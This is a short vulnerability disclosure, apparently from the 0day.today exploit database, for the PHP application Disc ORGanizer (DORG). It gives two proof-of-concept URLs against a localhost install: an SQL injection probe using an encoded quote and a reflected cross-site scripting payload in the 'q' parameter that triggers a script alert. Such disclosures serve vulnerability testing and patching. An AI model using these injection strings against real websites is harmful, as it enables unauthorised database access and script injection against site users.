[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Disc ORGanizer - DORG - Multiple Vulnerabilities

Author
SECUPENT
Risk
[
Security Risk High
]
0day-ID
0day-ID-24970
Category
web applications
Date add
21-03-2016
Platform
php
Exploit Title:  DORG - Disc Organization System SQL Injection And Cross Site Scripting 
Software Link: http://www.opensourcecms.com/scripts/details.php?scriptid=479
Author: SECUPENT 
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 20-3-2016
 
 
SQL Injection: 
 
link: http://localhost/dorg/results.php?q=3&search=%2527&type=3
 
Screenshot: http://secupent.com/exploit/images/drogsql.jpg
 
Cross Site Scripting (XSS):
 
link: http://localhost/dorg/results.php?q=%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%3Ealert%280x00194A%29%3C%2fscRipt%3E&search=Search&type=3
 
Screenshot: http://secupent.com/exploit/images/drogxss.jpg

#  0day.today [2024-11-15]  #